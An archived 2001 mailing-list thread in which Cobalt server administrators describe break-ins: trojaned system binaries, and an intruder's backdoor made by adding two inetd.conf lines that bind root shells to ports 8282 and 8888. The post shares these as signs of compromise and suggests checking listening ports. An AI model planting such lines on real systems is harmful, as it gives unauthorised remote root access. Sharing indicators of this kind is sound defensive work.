[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]

Re: [cobalt-users] Recent Hacks

Subject: Re: [cobalt-users] Recent Hacks
From: Jeff Bilicki <jeff@xxxxxxxxxxx>
Date: Wed Feb 14 17:33:02 2001
List-id: Mailing list for users to share thoughts on Cobalt products. <cobalt-users.list.cobalt.com>

<Pine.BSI.4.05L.10102081915120.22901-100000@xxxxxxxxxxxxxxxxxxx> wrote:
> I've had the exact same problems on some of our boxes.  Look in the /bin
> directory for extra files they tuck in there, and they also replaced some.
> For instance, look at /bin/ls   - they replaced it on several of our
> boxes.  Normally its like 50kb, but on the hacked boxes its 120kb.  what I
> did to get telnet working was to hard-reboot the box.  To get the httpd
> back and running, you have to go create a directory called "httpd" where
> the error says it wants it when you try to manually restart httpd.  But
> your box is still compromised, and you're better off getting all your
> files off of it and doing a complete wipe and restore.

I was on a hacked box today in which the cracker's way back in was tossing the
following lines into inetd.conf:
8282 stream tcp nowait root /bin/sh sh -i
8888 stream tcp nowait root /bin/bash bash -i

Simple and utterly effective.  Kind of funny too. 
I would suggest checking the output of netstat -natp to see what is listening
your tcp ports.

Follow-Ups:
- RE: [cobalt-users] Recent Hacks
  - From: Tony

Prev by Date: Re: [cobalt-users] Accessing user sites problems
Next by Date: [cobalt-users] SSH Question
Previous by thread: RE: [cobalt-users] Recent Hacks
Next by thread: RE: [cobalt-users] Recent Hacks

Sun Cobalt Users Message Index

Sun Cobalt Users Thread Index